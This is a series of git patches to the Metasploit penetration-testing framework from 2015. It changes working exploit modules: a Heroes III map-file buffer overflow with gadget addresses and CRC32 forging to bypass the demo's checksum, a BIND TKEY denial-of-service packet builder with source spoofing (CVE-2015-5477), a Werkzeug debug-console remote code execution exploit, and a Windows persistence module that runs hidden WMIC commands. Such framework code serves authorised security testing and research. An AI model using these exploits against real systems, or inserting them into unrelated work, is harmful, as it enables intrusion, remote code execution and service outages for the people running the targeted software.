+              'Ret' => 0x004EFF87, # CALL ESP Heroes3.exe
             }
           ],
           [
@@ -74,7 +74,7 @@ class Metasploit3 < Msf::Exploit::Remote
             {
               'Anticrash1' => 0x00456A48,
               'Anticrash2' => 0x006A6830,
-              'Ret' => 0x00580C0F, # CALL [ESP] Heroes3 HD.exe
+              'Ret' => 0x00580C0F, # CALL ESP Heroes3 HD.exe
             }
           ]
         ],

From 16042cd45b750d527e8b997c382fe334d6dfd21e Mon Sep 17 00:00:00 2001
From: aakerblom <q@nomail.com>
Date: Fri, 31 Jul 2015 18:16:15 -0700
Subject: [PATCH 0915/1013] fix variable names in comment

---
 modules/exploits/windows/fileformat/homm3_h3m.rb | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/modules/exploits/windows/fileformat/homm3_h3m.rb b/modules/exploits/windows/fileformat/homm3_h3m.rb
index c13eabeb0d..e8423f3ad4 100644
--- a/modules/exploits/windows/fileformat/homm3_h3m.rb
+++ b/modules/exploits/windows/fileformat/homm3_h3m.rb
@@ -42,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote
               # Two "Anticrash"-gadgets are needed or the game will crash before ret
               #
               # Anticrash1, needs to pass the following code down to final JMP:
-              # MOV EAX, DWORD PTR DS : [ESI + 4] ; [anticrash_gadget1 + 4]
+              # MOV EAX, DWORD PTR DS : [ESI + 4] ; [Anticrash1 + 4]
               # XOR EBX, EBX
               # CMP EAX, EBX
               # JE SHORT <crash spot> ; JMP to crash if EAX is 0
@@ -59,8 +59,8 @@ class Metasploit3 < Msf::Exploit::Remote
               'Anticrash1' => 0x004497D4,
               # Anticrash2, needs to return out of the following call (tricky):
               #
-              # MOV EAX, DWORD PTR DS : [ECX] ; [anticrash_gadget2]
-              # CALL DWORD PTR DS : [EAX + 4] ; [[anticrash_gadget2] + 4]
+              # MOV EAX, DWORD PTR DS : [ECX] ; [Anticrash2]
+              # CALL DWORD PTR DS : [EAX + 4] ; [[Anticrash2] + 4]
               #
               # Summary: An address which when dereferenced leads to an address that
               # when incremented by 4 and then deferenced leads to a function returning

From 908d6f946ffb4abe875e17d26661f1b116ac2dc1 Mon Sep 17 00:00:00 2001
From: aakerblom <q@nomail.com>
Date: Fri, 31 Jul 2015 18:19:37 -0700
Subject: [PATCH 0916/1013] added target Heroes III Demo 1.0.0.0

---
 .../exploits/windows/fileformat/homm3_h3m.rb  | 27 +++++++++++++++++--
 1 file changed, 25 insertions(+), 2 deletions(-)

diff --git a/modules/exploits/windows/fileformat/homm3_h3m.rb b/modules/exploits/windows/fileformat/homm3_h3m.rb
index e8423f3ad4..cc15e90741 100644
--- a/modules/exploits/windows/fileformat/homm3_h3m.rb
+++ b/modules/exploits/windows/fileformat/homm3_h3m.rb
@@ -67,6 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote
               # without accessing any registers/memory that would cause a crash.
               'Anticrash2' => 0x006A6430,
               'Ret' => 0x004EFF87, # CALL ESP Heroes3.exe
+              'Padding' => 121 # Amount of bytes from exploit's 7 initial 0x00 bytes and saved eip
             }
           ],
           [
@@ -75,6 +76,28 @@ class Metasploit3 < Msf::Exploit::Remote
               'Anticrash1' => 0x00456A48,
               'Anticrash2' => 0x006A6830,
               'Ret' => 0x00580C0F, # CALL ESP Heroes3 HD.exe
+              'Padding' => 121 # Amount of bytes from exploit's 7 initial 0x00 bytes and saved eip
+            }
+          ],
+          [
+            # Note that the demo version can normally only load the map it comes with, so
+            # additional code not covered by this module is needed to fool the size/checksum check
+            # or a modified h3demo.exe has to be run. Additionally, an error Message Box appears
+            # for this target, and the overflow occurs when OK is pressed
+            'Heroes III Demo 1.0.0.0 [h3demo.exe 522B6F45F534058D02A561838559B1F4]',
+            {
+              # The two anticrash gadgets are accessed in reverse order for this target,
+              # meaning that the documentation above for Anticrash1 applies to Anticrash2
+              # here. However, Anticrash1 here is accessed differently than the other targets.
+              # Anticrash1, needs to pass the following code:
+              # CMP BYTE PTR SS:[EBP+5C], 72 ; [Anticrash1 + 0x5C]
+              # JNE 00591F37
+              # MOV EAX,DWORD PTR SS:[EBP+38] ; [Anticrash1 + 0x38]
+              'Anticrash1' => 0x00580C0F, # Coincidentally the Ret value from HD Mod target
+              # Anticrash2, see documentation for Anticrash1 (not 2) in H3 Complete 4.0.0.0 target
+              'Anticrash2' => 0x001899A8,
+              'Ret' => 0x0043EAB1, # CALL ESP h3demo.exe
+              'Padding' => 109 # Amount of bytes from exploit's 7 initial 0x00 bytes and saved eip
             }
           ]
         ],
@@ -129,11 +152,11 @@ class Metasploit3 < Msf::Exploit::Remote
     # After the 7 0x00 bytes comes 121 bytes of random data and then the CALL ESP-gadget for
     # overwriting the saved eip. Finally two "anticrash gadgets" that are used by the game before
     # it returns to the CALL ESP-gadget are required for the game not to crash before returning.
-    size = 144 + payload.encoded.size
+    size = 7 + target['Padding'] + 4 + 4 + 4 + payload.encoded.size
     exp = ''
     exp << [size].pack('V')
     exp << "\x00" * 7 # The first byte terminates string, next 2 dont matter, last 4 need to be 0
-    exp << rand_text(121)
+    exp << rand_text(target['Padding'])
     exp << [target.ret].pack('V')
     exp << [target['Anticrash1']].pack('V')
     exp << [target['Anticrash2']].pack('V')

From 7af83a112db7a318525e3aca61bfacad0b91d5cb Mon Sep 17 00:00:00 2001
From: aakerblom <q@nomail.com>
Date: Sat, 1 Aug 2015 04:52:50 -0700
Subject: [PATCH 0917/1013] fix unreliable address

---
 modules/exploits/windows/fileformat/homm3_h3m.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/windows/fileformat/homm3_h3m.rb b/modules/exploits/windows/fileformat/homm3_h3m.rb
index cc15e90741..f19a908bbf 100644
--- a/modules/exploits/windows/fileformat/homm3_h3m.rb
+++ b/modules/exploits/windows/fileformat/homm3_h3m.rb
@@ -95,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote
               # MOV EAX,DWORD PTR SS:[EBP+38] ; [Anticrash1 + 0x38]
               'Anticrash1' => 0x00580C0F, # Coincidentally the Ret value from HD Mod target
               # Anticrash2, see documentation for Anticrash1 (not 2) in H3 Complete 4.0.0.0 target
-              'Anticrash2' => 0x001899A8,
+              'Anticrash2' => 0x005CE200,
               'Ret' => 0x0043EAB1, # CALL ESP h3demo.exe
               'Padding' => 109 # Amount of bytes from exploit's 7 initial 0x00 bytes and saved eip
             }

From 7c5e5f0f2243644cb2c22263025fd1c635b8a3d6 Mon Sep 17 00:00:00 2001
From: aakerblom <q@nomail.com>
Date: Sat, 1 Aug 2015 04:53:49 -0700
Subject: [PATCH 0918/1013] add crc32 forging for Heroes III demo target

---
 .../exploits/windows/fileformat/homm3_h3m.rb  | 109 +++++++++++++++++-
 1 file changed, 104 insertions(+), 5 deletions(-)

diff --git a/modules/exploits/windows/fileformat/homm3_h3m.rb b/modules/exploits/windows/fileformat/homm3_h3m.rb
index f19a908bbf..b2a98e1245 100644
--- a/modules/exploits/windows/fileformat/homm3_h3m.rb
+++ b/modules/exploits/windows/fileformat/homm3_h3m.rb
@@ -4,6 +4,7 @@
 ##
 
 require 'msf/core'
+require 'zlib'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
@@ -80,10 +81,6 @@ class Metasploit3 < Msf::Exploit::Remote
             }
           ],
           [
-            # Note that the demo version can normally only load the map it comes with, so
-            # additional code not covered by this module is needed to fool the size/checksum check
-            # or a modified h3demo.exe has to be run. Additionally, an error Message Box appears
-            # for this target, and the overflow occurs when OK is pressed
             'Heroes III Demo 1.0.0.0 [h3demo.exe 522B6F45F534058D02A561838559B1F4]',
             {
               # The two anticrash gadgets are accessed in reverse order for this target,
@@ -97,7 +94,8 @@ class Metasploit3 < Msf::Exploit::Remote
               # Anticrash2, see documentation for Anticrash1 (not 2) in H3 Complete 4.0.0.0 target
               'Anticrash2' => 0x005CE200,
               'Ret' => 0x0043EAB1, # CALL ESP h3demo.exe
-              'Padding' => 109 # Amount of bytes from exploit's 7 initial 0x00 bytes and saved eip
+              'Padding' => 109, # Amount of bytes from exploit's 7 initial 0x00 bytes and saved eip
+              'CRC32' => 0xFEEFB9EB
             }
           ]
         ],
@@ -168,6 +166,17 @@ class Metasploit3 < Msf::Exploit::Remote
     buf[from..to] = exp
     print_good('Embedded exploit between decimal file offsets ' + from.to_s + ' and ' + to.to_s)
 
+    # Demo version has a crc32 check to disallow other maps than the one it comes with.
+    if target['CRC32']
+      buf = forge_crc32(buf, target['CRC32'])
+      if Zlib.crc32(buf) == target['CRC32']
+        print_good('Forged CRC32 to 0x%08X by adding 4 bytes at end of file' % target['CRC32'])
+      else
+        print_error('Failed to forge CRC32')
+        return
+      end
+    end
+
     # Write the uncompressed exploit .h3m (the game can load uncompressed .h3ms)
     file_create(buf)
   end
@@ -219,4 +228,94 @@ class Metasploit3 < Msf::Exploit::Remote
 
     buf
   end
+
+  #
+  # Forge crc32 by adding 4 bytes at the end of data
+  # http://blog.stalkr.net/2011/03/crc-32-forging.html
+  #
+  def forge_crc32(data, wanted_crc)
+    crc32_reverse = [
+      0x00000000, 0xDB710641, 0x6D930AC3, 0xB6E20C82,
+      0xDB261586, 0x005713C7, 0xB6B51F45, 0x6DC41904,
+      0x6D3D2D4D, 0xB64C2B0C, 0x00AE278E, 0xDBDF21CF,
+      0xB61B38CB, 0x6D6A3E8A, 0xDB883208, 0x00F93449,
+      0xDA7A5A9A, 0x010B5CDB, 0xB7E95059, 0x6C985618,
+      0x015C4F1C, 0xDA2D495D, 0x6CCF45DF, 0xB7BE439E,
+      0xB74777D7, 0x6C367196, 0xDAD47D14, 0x01A57B55,
+      0x6C616251, 0xB7106410, 0x01F26892, 0xDA836ED3,
+      0x6F85B375, 0xB4F4B534, 0x0216B9B6, 0xD967BFF7,
+      0xB4A3A6F3, 0x6FD2A0B2, 0xD930AC30, 0x0241AA71,
+      0x02B89E38, 0xD9C99879, 0x6F2B94FB, 0xB45A92BA,
+      0xD99E8BBE, 0x02EF8DFF, 0xB40D817D, 0x6F7C873C,
+      0xB5FFE9EF, 0x6E8EEFAE, 0xD86CE32C, 0x031DE56D,
+      0x6ED9FC69, 0xB5A8FA28, 0x034AF6AA, 0xD83BF0EB,
+      0xD8C2C4A2, 0x03B3C2E3, 0xB551CE61, 0x6E20C820,
+      0x03E4D124, 0xD895D765, 0x6E77DBE7, 0xB506DDA6,
+      0xDF0B66EA, 0x047A60AB, 0xB2986C29, 0x69E96A68,
+      0x042D736C, 0xDF5C752D, 0x69BE79AF, 0xB2CF7FEE,
+      0xB2364BA7, 0x69474DE6, 0xDFA54164, 0x04D44725,
+      0x69105E21, 0xB2615860, 0x048354E2, 0xDFF252A3,
+      0x05713C70, 0xDE003A31, 0x68E236B3, 0xB39330F2,
+      0xDE5729F6, 0x05262FB7, 0xB3C42335, 0x68B52574,
+      0x684C113D, 0xB33D177C, 0x05DF1BFE, 0xDEAE1DBF,
+      0xB36A04BB, 0x681B02FA, 0xDEF90E78, 0x05880839,
+      0xB08ED59F, 0x6BFFD3DE, 0xDD1DDF5C, 0x066CD91D,
+      0x6BA8C019, 0xB0D9C658, 0x063BCADA, 0xDD4ACC9B,
+      0xDDB3F8D2, 0x06C2FE93, 0xB020F211, 0x6B51F450,
+      0x0695ED54, 0xDDE4EB15, 0x6B06E797, 0xB077E1D6,
+      0x6AF48F05, 0xB1858944, 0x076785C6, 0xDC168387,
+      0xB1D29A83, 0x6AA39CC2, 0xDC419040, 0x07309601,
+      0x07C9A248, 0xDCB8A409, 0x6A5AA88B, 0xB12BAECA,
+      0xDCEFB7CE, 0x079EB18F, 0xB17CBD0D, 0x6A0DBB4C,
+      0x6567CB95, 0xBE16CDD4, 0x08F4C156, 0xD385C717,
+      0xBE41DE13, 0x6530D852, 0xD3D2D4D0, 0x08A3D291,
+      0x085AE6D8, 0xD32BE099, 0x65C9EC1B, 0xBEB8EA5A,
+      0xD37CF35E, 0x080DF51F, 0xBEEFF99D, 0x659EFFDC,
+      0xBF1D910F, 0x646C974E, 0xD28E9BCC, 0x09FF9D8D,
+      0x643B8489, 0xBF4A82C8, 0x09A88E4A, 0xD2D9880B,
+      0xD220BC42, 0x0951BA03, 0xBFB3B681, 0x64C2B0C0,
+      0x0906A9C4, 0xD277AF85, 0x6495A307, 0xBFE4A546,
+      0x0AE278E0, 0xD1937EA1, 0x67717223, 0xBC007462,
+      0xD1C46D66, 0x0AB56B27, 0xBC5767A5, 0x672661E4,
+      0x67DF55AD, 0xBCAE53EC, 0x0A4C5F6E, 0xD13D592F,
+      0xBCF9402B, 0x6788466A, 0xD16A4AE8, 0x0A1B4CA9,
+      0xD098227A, 0x0BE9243B, 0xBD0B28B9, 0x667A2EF8,
+      0x0BBE37FC, 0xD0CF31BD, 0x662D3D3F, 0xBD5C3B7E,
+      0xBDA50F37, 0x66D40976, 0xD03605F4, 0x0B4703B5,
+      0x66831AB1, 0xBDF21CF0, 0x0B101072, 0xD0611633,
+      0xBA6CAD7F, 0x611DAB3E, 0xD7FFA7BC, 0x0C8EA1FD,
+      0x614AB8F9, 0xBA3BBEB8, 0x0CD9B23A, 0xD7A8B47B,
+      0xD7518032, 0x0C208673, 0xBAC28AF1, 0x61B38CB0,
+      0x0C7795B4, 0xD70693F5, 0x61E49F77, 0xBA959936,
+      0x6016F7E5, 0xBB67F1A4, 0x0D85FD26, 0xD6F4FB67,
+      0xBB30E263, 0x6041E422, 0xD6A3E8A0, 0x0DD2EEE1,
+      0x0D2BDAA8, 0xD65ADCE9, 0x60B8D06B, 0xBBC9D62A,
+      0xD60DCF2E, 0x0D7CC96F, 0xBB9EC5ED, 0x60EFC3AC,
+      0xD5E91E0A, 0x0E98184B, 0xB87A14C9, 0x630B1288,
+      0x0ECF0B8C, 0xD5BE0DCD, 0x635C014F, 0xB82D070E,
+      0xB8D43347, 0x63A53506, 0xD5473984, 0x0E363FC5,
+      0x63F226C1, 0xB8832080, 0x0E612C02, 0xD5102A43,
+      0x0F934490, 0xD4E242D1, 0x62004E53, 0xB9714812,
+      0xD4B55116, 0x0FC45757, 0xB9265BD5, 0x62575D94,
+      0x62AE69DD, 0xB9DF6F9C, 0x0F3D631E, 0xD44C655F,
+      0xB9887C5B, 0x62F97A1A, 0xD41B7698, 0x0F6A70D9
+    ]
+
+    # forward calculation of CRC up to pos, sets current forward CRC state
+    fwd_crc = 0xffffffff
+    data.each_byte do |c|
+      fwd_crc = (fwd_crc >> 8) ^ Zlib.crc_table[(fwd_crc ^ c) & 0xff]
+    end
+
+    # backward calculation of CRC up to pos, sets wanted backward CRC state
+    bkd_crc = wanted_crc ^ 0xffffffff
+
+    # deduce the 4 bytes we need to insert
+    [fwd_crc].pack('<L').each_byte.reverse_each do |c|
+      bkd_crc = ((bkd_crc << 8) & 0xffffffff) ^ crc32_reverse[bkd_crc >> 24] ^ c
+    end
+
+    res = data + [bkd_crc].pack('<L')
+    res
+  end
 end
\ No newline at end of file

From 1ec960d8f97b2f18e634b4b58ab70adfb22646a5 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 31 Jul 2015 16:43:43 -0500
Subject: [PATCH 0919/1013] Make the time to write flush configurable

---
 modules/exploits/windows/local/vss_persistence.rb | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/modules/exploits/windows/local/vss_persistence.rb b/modules/exploits/windows/local/vss_persistence.rb
index 86129b3c3d..1d46addafe 100644
--- a/modules/exploits/windows/local/vss_persistence.rb
+++ b/modules/exploits/windows/local/vss_persistence.rb
@@ -46,6 +46,7 @@ class Metasploit3 < Msf::Exploit::Local
         OptBool.new('SCHTASK', [ true, 'Create a Scheduled Task for the EXE.', false]),
         OptBool.new('RUNKEY', [ true, 'Create AutoRun Key for the EXE', false]),
         OptInt.new('DELAY', [ true, 'Delay in Minutes for Reconnect attempt. Needs SCHTASK set to true to work. Default delay is 1 minute.', 1]),
+        OptInt.new('WMIC_WRITE_TIMEOUT', [ true, 'Timeout in seconds to allow the wmic process to flush output', 5]),
         OptString.new('RPATH', [ false, 'Path on remote system to place Executable. Example: \\\\Windows\\\\Temp (DO NOT USE C:\\ in your RPATH!)', ]),
       ], self.class)
 
@@ -221,7 +222,7 @@ class Metasploit3 < Msf::Exploit::Local
       r.close
 
       # Give the process time to flush the output
-      Rex.sleep(2)
+      Rex.sleep(datastore['WMIC_WRITE_TIMEOUT'])
 
       # Read the output file of the wmic commands
       wmi_out_file = session.fs.file.new(wmi_cfl, 'rb')

From fcb798119916727e6574d2002207b0c2aef94885 Mon Sep 17 00:00:00 2001
From: William Vu <William_Vu@rapid7.com>
Date: Fri, 31 Jul 2015 17:00:16 -0500
Subject: [PATCH 0920/1013] Add BIND TKEY DoS

---
 lib/msf/core/exploit/capture.rb        |  2 +-
 modules/auxiliary/dos/dns/bind_tkey.rb | 85 ++++++++++++++++++++++++++
 2 files changed, 86 insertions(+), 1 deletion(-)
 create mode 100644 modules/auxiliary/dos/dns/bind_tkey.rb

diff --git a/lib/msf/core/exploit/capture.rb b/lib/msf/core/exploit/capture.rb
index 3bf3da504e..b220d6c429 100644
--- a/lib/msf/core/exploit/capture.rb
+++ b/lib/msf/core/exploit/capture.rb
@@ -250,7 +250,7 @@ module Msf
       # The return value either be a PacketFu::Packet object, or nil
       def inject_reply(proto=:udp, pcap=self.capture)
         # Defaults to ~2 seconds
-        to = (datastore['TIMEOUT'] * 4) / 1000.0
+        to = ((datastore['TIMEOUT'] || 500).to_f * 4) / 1000.0
         raise RuntimeError, "Could not access the capture process (remember to open_pcap first!)" if not pcap
         begin
           ::Timeout.timeout(to) do
diff --git a/modules/auxiliary/dos/dns/bind_tkey.rb b/modules/auxiliary/dos/dns/bind_tkey.rb
new file mode 100644
index 0000000000..39f1a2ae90
--- /dev/null
+++ b/modules/auxiliary/dos/dns/bind_tkey.rb
@@ -0,0 +1,85 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Auxiliary
+
+  include Msf::Exploit::Capture
+  include Msf::Auxiliary::UDPScanner
+  include Msf::Auxiliary::Dos
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'BIND TKEY Query Denial of Service',
+      'Description'    => %q{
+        This module exploits an error in handling TKEY queries that can cause
+        named to exit with a REQUIRE assertion failure.
+      },
+      'Author'         => [
+        'throwawayokejxqbbif', # PoC
+        'wvu'                  # Module
+      ],
+      'References'     => [
+        ['CVE', '2015-5477'],
+        ['URL', 'https://kb.isc.org/article/AA-01272'],
+        ['URL', 'https://github.com/rapid7/metasploit-framework/issues/5790']
+      ],
+      'DisclosureDate' => 'Jul 28 2015',
+      'License'        => MSF_LICENSE,
+      'DefaultOptions' => {'ScannerRecvWindow' => 0}
+    ))
+
+    register_options([
+      Opt::RPORT(53),
+      OptAddress.new('SRC_ADDR', [false, 'Source address to spoof', nil])
+    ])
+
+    deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT')
+  end
+
+  def scan_host(ip)
+    if datastore['SRC_ADDR']
+      scanner_spoof_send(payload, ip, rport, datastore['SRC_ADDR'])
+    else
+      print_status("Sending packet to #{ip}")
+      scanner_send(payload, ip, rport)
+    end
+  end
+
+  def payload
+    name = Rex::Text.rand_text_alphanumeric(rand(42) + 1)
+    txt  = Rex::Text.rand_text_alphanumeric(rand(42) + 1)
+
+    name_length = [name.length].pack('C')
+    txt_length  = [txt.length].pack('C')
+    data_length = [txt.length + 1].pack('n')
+    ttl         = [rand(2 ** 31 - 1) + 1].pack('N')
+
+    query  = "\x00\x00"  # Transaction ID: 0x0000
+    query << "\x00\x00"  # Flags: 0x0000 Standard query
+    query << "\x00\x01"  # Questions: 1
+    query << "\x00\x00"  # Answer RRs: 0
+    query << "\x00\x00"  # Authority RRs: 0
+    query << "\x00\x01"  # Additional RRs: 1
+
+    query << name_length # [Name Length]
+    query << name        # Name
+    query << "\x00"      # [End of name]
+    query << "\x00\xf9"  # Type: TKEY (Transaction Key) (249)
+    query << "\x00\x01"  # Class: IN (0x0001)
+
+    query << name_length # [Name Length]
+    query << name        # Name
+    query << "\x00"      # [End of name]
+    query << "\x00\x10"  # Type: TXT (Text strings) (16)
+    query << "\x00\x01"  # Class: IN (0x0001)
+    query << ttl         # Time to live
+    query << data_length # Data length
+    query << txt_length  # TXT Length
+    query << txt         # TXT
+  end
+
+end

From ceb49a51a69d7ffd9303ca2cd86b34a183edf02c Mon Sep 17 00:00:00 2001
From: h00die <mike@shorebreaksecurity.com>
Date: Sat, 1 Aug 2015 11:11:37 -0400
Subject: [PATCH 0921/1013] thanks @espreto for help

---
 .../exploits/multi/http/werkzeug_debug_rce.rb | 53 +++++++++----------
 1 file changed, 26 insertions(+), 27 deletions(-)

diff --git a/modules/exploits/multi/http/werkzeug_debug_rce.rb b/modules/exploits/multi/http/werkzeug_debug_rce.rb
index cae53152f9..96ff0188c5 100644
--- a/modules/exploits/multi/http/werkzeug_debug_rce.rb
+++ b/modules/exploits/multi/http/werkzeug_debug_rce.rb
@@ -29,52 +29,51 @@ class Metasploit4 < Msf::Exploit::Remote
           ],
       'License'     => MSF_LICENSE,
       'Platform'       => ['python'],
-      'Targets'        => [[ 'werkzeug 0.10 and older', { }]],
+      'Targets'        => [[ 'werkzeug 0.10 and older', {}]],
       'Arch'           => ARCH_PYTHON,
       'DefaultTarget'  => 0,
       'DisclosureDate' => 'Jun 28 2015',
     )
     register_options(
       [
-        OptString.new('TARGETURI',[true,'URI to the console','/console'])
+        OptString.new('TARGETURI', [true, 'URI to the console', '/console'])
       ], self.class
     )
   end
 
   def check
-    res = send_request_cgi({
-        'method'   => 'GET',
-        'uri'      => normalize_uri(datastore['TARGETURI'])
-    })
-    #https://github.com/mitsuhiko/werkzeug/blob/cc8c8396ecdbc25bedc1cfdddfe8df2387b72ae3/werkzeug/debug/tbtools.py#L67
-    if res and res.body =~ /Werkzeug powered traceback interpreter/
+    res = send_request_cgi(
+      'method'   => 'GET',
+      'uri'      => normalize_uri(datastore['TARGETURI'])
+    )
+    # https://github.com/mitsuhiko/werkzeug/blob/cc8c8396ecdbc25bedc1cfdddfe8df2387b72ae3/werkzeug/debug/tbtools.py#L67
+    if res && res.body =~ /Werkzeug powered traceback interpreter/
       return Exploit::CheckCode::Appears
     end
-    return Exploit::CheckCode::Safe
+    Exploit::CheckCode::Safe
   end
 
   def exploit
-    #first we need to get the SECRET code
-    res = send_request_cgi({
-        'method'   => 'GET',
-        'uri'      => normalize_uri(datastore['TARGETURI'])
-    })
+    # first we need to get the SECRET code
+    res = send_request_cgi(
+      'method'   => 'GET',
+      'uri'      => normalize_uri(datastore['TARGETURI'])
+    )
     if res && res.body && res.body.to_s =~ /SECRET = "([a-zA-Z0-9]{20})";/
       secret = $1
-      vprint_status("Secret Code: #{secret}")
-      res = send_request_cgi({
-          'method'   => 'GET',
-          'uri'      => normalize_uri(datastore['TARGETURI']),
-          'vars_get' => {
-              '__debugger__' => 'yes',
-              'cmd' => payload.encoded,
-              'frm' => '0',
-              's' => secret
-          }
-      })
+      vprint_status('Secret Code: #{secret}')
+      send_request_cgi(
+        'method'   => 'GET',
+        'uri'      => normalize_uri(datastore['TARGETURI']),
+        'vars_get' => {
+          '__debugger__' => 'yes',
+          'cmd' => payload.encoded,
+          'frm' => '0',
+          's' => secret
+        }
+      )
     else
-      print_error("Secret code not detected.")
+      print_error('Secret code not detected.')
     end
   end
 end
-

From cebcf72a99eecd309b6d31df186b9097df28ac7d Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Sat, 1 Aug 2015 10:31:41 -0500
Subject: [PATCH 0922/1013] Add discoverer credit, blog ref, longer desc

---
 modules/auxiliary/dos/dns/bind_tkey.rb | 12 +++++++++---
 1 file changed, 9 insertions(+), 3 deletions(-)

diff --git a/modules/auxiliary/dos/dns/bind_tkey.rb b/modules/auxiliary/dos/dns/bind_tkey.rb
index 39f1a2ae90..98bacb4f81 100644
--- a/modules/auxiliary/dos/dns/bind_tkey.rb
+++ b/modules/auxiliary/dos/dns/bind_tkey.rb
@@ -15,15 +15,21 @@ class Metasploit4 < Msf::Auxiliary
     super(update_info(info,
       'Name'           => 'BIND TKEY Query Denial of Service',
       'Description'    => %q{
-        This module exploits an error in handling TKEY queries that can cause
-        named to exit with a REQUIRE assertion failure.
+        This module sends a malformed TKEY query, which exploits an
+        error in handling TKEY queries on affected BIND9 'named' DNS servers.
+        As a result, a vulnerable named server will exit with a REQUIRE
+        assertion failure. This condition can be exploited in versions of BIND
+        between BIND 9.1.0 through 9.8.x, 9.9.0 through 9.9.7-P1 and 9.10.0
+        through 9.10.2-P2.
       },
       'Author'         => [
+        'Jonathan Foote',      # Original discoverer
         'throwawayokejxqbbif', # PoC
-        'wvu'                  # Module
+        'wvu'                  # Metasploit module
       ],
       'References'     => [
         ['CVE', '2015-5477'],
+        ['URL', 'https://www.isc.org/blogs/cve-2015-5477-an-error-in-handling-tkey-queries-can-cause-named-to-exit-with-a-require-assertion-failure/'],
         ['URL', 'https://kb.isc.org/article/AA-01272'],
         ['URL', 'https://github.com/rapid7/metasploit-framework/issues/5790']
       ],

From eab9b3bf5b0f4306ad80bd7938e093c3dde6c3c9 Mon Sep 17 00:00:00 2001
From: h00die <mike@shorebreaksecurity.com>
Date: Sat, 1 Aug 2015 14:39:12 -0400
Subject: [PATCH 0923/1013] interpolation fix on secret

---
 modules/exploits/multi/http/werkzeug_debug_rce.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/multi/http/werkzeug_debug_rce.rb b/modules/exploits/multi/http/werkzeug_debug_rce.rb
index 96ff0188c5..30843aab57 100644
--- a/modules/exploits/multi/http/werkzeug_debug_rce.rb
+++ b/modules/exploits/multi/http/werkzeug_debug_rce.rb
@@ -61,7 +61,7 @@ class Metasploit4 < Msf::Exploit::Remote
     )
     if res && res.body && res.body.to_s =~ /SECRET = "([a-zA-Z0-9]{20})";/
       secret = $1
-      vprint_status('Secret Code: #{secret}')
+      vprint_status("Secret Code: #{secret}")
       send_request_cgi(
         'method'   => 'GET',
         'uri'      => normalize_uri(datastore['TARGETURI']),

From a6a8117e466af13027f2ba8bec1054dafb100395 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Sat, 1 Aug 2015 22:35:24 +0100
Subject: [PATCH 0924/1013] Revert "Land #5777, fix #4558 vss_persistence"

This reverts commit ba4b2fbbeab765b0dda27578a044c49633954e11, reversing
changes made to affc86bfd9ea8ac4c1493f32b17486de402218ca.
---
 .../exploits/windows/local/vss_persistence.rb | 48 -------------------
 1 file changed, 48 deletions(-)

diff --git a/modules/exploits/windows/local/vss_persistence.rb b/modules/exploits/windows/local/vss_persistence.rb
index 1d46addafe..a869680f6a 100644
--- a/modules/exploits/windows/local/vss_persistence.rb
+++ b/modules/exploits/windows/local/vss_persistence.rb
@@ -46,7 +46,6 @@ class Metasploit3 < Msf::Exploit::Local
         OptBool.new('SCHTASK', [ true, 'Create a Scheduled Task for the EXE.', false]),
         OptBool.new('RUNKEY', [ true, 'Create AutoRun Key for the EXE', false]),
         OptInt.new('DELAY', [ true, 'Delay in Minutes for Reconnect attempt. Needs SCHTASK set to true to work. Default delay is 1 minute.', 1]),
-        OptInt.new('WMIC_WRITE_TIMEOUT', [ true, 'Timeout in seconds to allow the wmic process to flush output', 5]),
         OptString.new('RPATH', [ false, 'Path on remote system to place Executable. Example: \\\\Windows\\\\Temp (DO NOT USE C:\\ in your RPATH!)', ]),
       ], self.class)
 
@@ -195,51 +194,4 @@ class Metasploit3 < Msf::Exploit::Local
     print_status("Cleanup Meterpreter RC File: #{clean_rc}")
   end
 
-  #
-  # Execute a WMIC command
-  #
-  def wmic_query(wmic_cmd)
-    tmp_out = ''
-    old_timeout = session.response_timeout
-    session.response_timeout = 120
-    begin
-      tmp = expand_path('%TEMP%')
-      wmi_cfl = tmp + "\\" + sprintf('%.5d', rand(100000))
-      r = session.sys.process.execute("cmd.exe /c %SYSTEMROOT%\\system32\\wbem\\wmic.exe /append:#{wmi_cfl} #{wmic_cmd}", nil, {'Hidden' => true})
-      Rex.sleep(2)
-
-      # Making sure that wmic finishes before executing next wmic command
-      found = 0
-      while found == 0
-        session.sys.process.get_processes.each do |x|
-          found =1
-          if 'wmic.exe' == x['name'].downcase
-            Rex.sleep(0.5)
-            found = 0
-          end
-        end
-      end
-      r.close
-
-      # Give the process time to flush the output
-      Rex.sleep(datastore['WMIC_WRITE_TIMEOUT'])
-
-      # Read the output file of the wmic commands
-      wmi_out_file = session.fs.file.new(wmi_cfl, 'rb')
-      until wmi_out_file.eof?
-        tmp_out << wmi_out_file.read
-      end
-      wmi_out_file.close
-    rescue ::Exception => e
-      print_error("Error running WMIC commands: #{e.class} #{e}")
-    end
-    # We delete the file with the wmic command output.
-    c = session.sys.process.execute("cmd.exe /c del #{wmi_cfl}", nil, {'Hidden' => true})
-    c.close
-    tmp_out.gsub!(/[^[:print:]]/,'') #scrub out garbage
-
-    session.response_timeout = old_timeout
-    tmp_out
-  end
-
 end

From 0067d251807e28be47f4160d8dd7fe02bbab28e7 Mon Sep 17 00:00:00 2001
From: Brandon Perry <bperry.volatile@gmail.com>
Date: Sat, 1 Aug 2015 16:40:03 -0500
Subject: [PATCH 0925/1013] add the sepm auth bypass rce module

---
 .../windows/http/sepm_auth_bypass_rce.rb      | 103 ++++++++++++++++++
 1 file changed, 103 insertions(+)
 create mode 100644 modules/exploits/windows/http/sepm_auth_bypass_rce.rb

